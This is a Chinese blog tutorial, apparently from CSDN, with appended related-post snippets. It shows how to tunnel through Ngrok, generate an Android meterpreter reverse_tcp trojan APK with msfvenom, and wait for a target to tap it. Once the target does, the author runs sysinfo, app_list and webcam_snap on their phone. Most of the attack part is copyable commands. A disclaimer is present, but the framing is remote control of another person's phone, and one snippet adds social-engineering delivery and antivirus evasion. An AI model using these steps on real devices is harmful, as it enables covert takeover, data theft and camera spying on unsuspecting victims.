kali Linux外网渗透控制Android安卓手机系统。

已于 2023-11-29 15:31:46 修改
阅读量8.1w 收藏 198
点赞数 21
CC 4.0 BY-SA版权
分类专栏: 黑客 文章标签: linux android debian 安全架构 系统安全
于 2022-09-23 15:42:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunwanfulove/article/details/127012021
本文详细介绍了如何使用Kali Linux进行渗透测试,通过Ngrok穿透内外网,创建Android木马APK,监听并控制目标设备。重点讲解了Ngrok注册、Kali配置、MSF工具生成外网木马以及执行操作的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!

简介:

Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 

Kali常用配置和基本使用:

  • Kali工具集介绍
  • 修改Kali源和更新软件
  • Kali伪装成win10
  • Kali启动root用户

1.外网步骤思想图

Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成test.apk ----->监听当前Ip是否点击---->目标电脑发送exe---->点击test.apk

1、进入Ngrok网站注册一个用户(Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

 

 

2.下载Kali LInux版本 Sunny-Ngrok内网转发

  1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 

 2. 拖入虚拟器托不进去看上一个教程  解压zip

 

3.进入解压好的目录:   报错Tcp就重新去Ngrok重新换一个隧道免费很多人用

./sunny clientid  id  =>隧道id

启动了当前窗口不要关闭

3、MSF生成外网木马

                                                                                      不加Tcp| 端口不然报错

msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk

4、打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole 开启

5.绑定当前端口Ip

  1. use multi/handler 

  2.  set payload android/meterpreter/reverse_tcp

  3. set LHOST 当前Ip Kali

  4. set LPORT 4444

  1. show options (查看IP端口设置情况)

  3. run (开启监听)

 6.等待对方点击test.apk木马病毒

成功就有meterpreter命令行 执行命令即可

sysinfo //查看手机信息
 

 

 app_list //查看手机app信息

 

 

 webcam_snap  //拍照
 

 

保存到此目录

成功拍照。

:我的手机拍照过程有声音,

总结:

就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

监听到信息连接----->成功!!!

使用kali测试攻击Android9.0手机
01-18 1262
说出来你们可能不相信我这么厉害,第一次使用这台模拟的手机就已经被注入木马了。
轻松使用Kali Linux的MSF模拟安卓渗透(By:Kali与编程)
Kali与编程
09-15 494
通过Kali对安卓设备的渗透测试,我们可以发现手机中的安全隐患。这表明安卓安全至关重要,因为手机里有个人信息、照片等重要数据。加强安全措施,能防止数据泄露,保护隐私安全。定期更新系统和应用、安装安全软件、不随便点链接或下载未知来源的应用,都是必要的防护手段。lhost 表示:KALI监听主机。lport 表示:KALI监听端口。
基于Android设备的Kali Linux渗透测试教程1
06-13
基于Android设备的Kali Linux渗透测试教程1,基于Android设备的Kali Linux渗透测试教程1
Kali Linux Windows渗透教程从0到解决思路。
sunwanfulove的博客
09-22 2469
Kali Linux Windows渗透教程从0到解决思路成为安全工程师必备技能。
【2025版】最新Kali Linux安装教程(非常详细),零基础入门到精通,看这一篇就够了_kali安装_kali最新版安装教程
zz96405784848的博客
06-30 1383
《2025版Kali Linux安装教程》详细介绍了Kali Linux的下载、安装与基础配置。教程推荐下载Virtual Machines版本,使用VMWare直接运行虚拟机,默认用户名密码均为kali。重点包括:通过sudo passwd root修改root密码;使用sudo su切换root用户;通过dpkg-reconfigure locales设置中文语言;以及替换阿里云APT源优化软件下载速度。文中特别强调安装过程中可能遇到的临时文件提示和保存权限问题,并提供了解决方案。该教程适合零基础用户快
前路漫漫,写给初级网安工程师的一份指南!
kjuhfkicf154的博客
05-27 306
2023网安入门超全指南
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 7692
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
基于Android设备的Kali Linux渗透测试教程第1章渗透测试
大学霸__IT达人
10-27 2468
基于Android设备的Kali Linux渗透测试教程第1章渗透测试 渗透测试(Penetration Testing)是一种通过模拟攻击者所采用的技术与方法,攻击目标系统的安全控制措施,并取得访问控制系统的安全测试方式。如果要进行渗透测试,必须有对应的工具。在Kali Linux中,集成了所有的渗透测试工具。本章将介绍渗透测试的基础知识,以及如何在各种设备上安装Kali Linux和远程连接
简单的渗透(远程反向控制)——kali linux操控Android系统
m0_56451748的博客
11-23 3647
简单的远程反向控制
kali linux渗透外网手机
06-06
Kali Linux 是一种流行的渗透测试操作系统,可用于测试和评估计算机系统和网络的安全性。如果您想使用 Kali Linux 渗透测试外部网络和手机,需要具备一定的计算机技能和知识。 首先,您需要了解一些基本的网络安全...
Kali Linux:网络与安全专家的终极武器
2401_89213088的博客
01-11 989
本书将通过分析黑客采用的攻击战术来提升测试者的渗透测试技能:通过实验室集成到云服务,从而了解在渗透测试中通常被忽略的一个开发维度;探索在虚拟机和容器化环境中安装和运行Kali Linux的不同方法,以及使用容器在AWS上部署易受攻击的云服务,利用配置错误的S3桶来访问EC2实例;深入研究被动和主动侦察,从获取用户信息到大规模端口扫描,在此基础上,探索了不同的脆弱性评估,包括威胁建模;讲述了如何在受损系统上使用横向移动、特权升级以及命令与控制(C2);
基于Android设备的Kali Linux渗透测试基础
08-02
基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程基于Android设备的Kali Linux渗透测试教程
Msf--控制 Android手机
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
08-02 1529
|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负! 0.环境 虚拟机 KaliLinux 手机 Redmi 6A 同一局域网下 1.查看控制端IP ifconfig 即192.168.xx.xxx 2.生成木马程序 >>>msfvenom -p android/meterpreter/reverse_tcp lh...
kali 控制安卓手机
lws24919的博客
01-06 8513
ip add //查看kali 的ip地址 虚拟机桥接模式 msfvenom -p android/meterpreter/reverse_tcp LHOST=kali的ip地址 LPORT=4444 R > t.apk 生成apk下载到手机 可以利用kali Apache2 在局域网内直接下载apk或其他办法 sudo cp t.apk /var/www/html //拷贝到此目录可网页访问 vi /var/www/html/index.html //...
kali渗透安卓手机
热门推荐
weixin_43893278的博客
04-23 1万+
kali渗透安卓手机 1.打开kali,获取ip地址 ip地址为192.168.242.145 2.打开小米球或者sunny 3.使用msfvenom生成apk sudo msfvenom -a java -platform android -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.242.145 LPORT=8888 -o payload.apk 4.将生成的payload.apk传入手机中 5.运行msfconsole
Kali入侵Android系统
2301_77994635的博客
11-17 1897
三、将test.apk上传至攻击目标并启动。test.apk 生成的可执行木马文件名。1.选择multi/handler模块。3.设置lhost和lport(同上)2.设置payload(和上面一样)app_list 查看安装的app。ipconfig 查看网络配置信息。成功msf成功建立session。sysinfo 系统信息。lhost 本机ip。lport 监听端口。四、窥探目标环境信息。
Kali Linux 安全渗透教程<第二更>Linux安全渗透简介
大学霸__IT达人
05-29 2348
第1章  Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷、技术缺陷。本章将简要介绍Linux安全渗透及安全渗透工具的相关内容。本章主要知识点如下: q  什么是安全渗透 q  安全渗透所需工具 q  Kali Linux简介 q  安装Kali Linux q  Kali Linux
Kali利用MSF渗透安卓手机_kali入侵安卓手机(1)
2401_84519960的博客
05-01 1952
由于文章篇幅原因,我只把面试题列了出来,详细的答案,我整理成了一份PDF文档,这份文档还包括了还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料 ,帮助大家学习提升进阶,也节省大家在网上搜索资料的时间来学习。网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!
kalilinux手机/如何进行安卓渗透测试平台Kali的搭建_新手漏洞自学路线
2401_84915584的博客
06-13 1244
如何进行安卓渗透测试平台Kali的搭建:本文讲解
kali怎么远程控制手机
最新发布
07-12
Kali Linux 是一个专门为渗透测试和安全审计设计的操作系统,它包含了一系列强大的工具来帮助安全研究人员和黑客进行攻击和防御测试。如果目标是使用 Kali Linux 实现对手机的远程控制,则通常涉及生成一个恶意可执行文件(payload),并通过社会工程学或其他方法将其部署到目标设备上。以下是实现这一目标的基本步骤: ### 生成 Payload 使用 `msfvenom` 工具可以生成适用于不同平台的 payload。对于 Android 手机,可以使用如下命令生成一个反向 TCP 连接的 payload: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=你的公网IP LPORT=监听端口 -o 文件名.apk ``` 例如: ```bash msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=9999 -o MyDemo.apk ``` 此命令会创建一个名为 `MyDemo.apk` 的文件,它可以在 Android 设备上运行,并尝试连接到指定的 IP 地址和端口。 ### 设置 Metasploit Framework 在 Kali Linux 上启动 Metasploit Framework,并配置一个多处理监听器以接收来自 payload 的连接: ```bash msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 9999 exploit ``` 这将启动一个监听器,等待来自目标设备的连接请求。 ### 部署 Payload 生成的 `.apk` 文件需要被安装在目标手机上。这通常通过社会工程学手段完成,比如伪装成合法的应用程序发送给目标用户,或者通过其他漏洞利用方式注入到设备中。 ### 免杀技术 由于现代智能手机通常配备有安全防护措施(如 Google Play Protect),生成的 payload 可能会被检测为恶意软件。因此,可能需要使用一些免杀技术来绕过这些防护机制。这包括但不限于对 payload 进行加密、混淆、使用合法证书签名等方法。 ### 注意事项 - **合法性**:在任何情况下,未经授权对他人设备进行远程控制都是非法的行为。所有操作应在合法授权范围内进行,如渗透测试或安全研究。 - **道德责任**:即使技术上可行,也应遵守道德规范,不得滥用此类技术侵犯他人隐私或造成损害。 - **安全性**:确保自己的设备和网络环境安全,防止被他人利用相同的技术进行攻击。 ###
评论 28
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大福ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值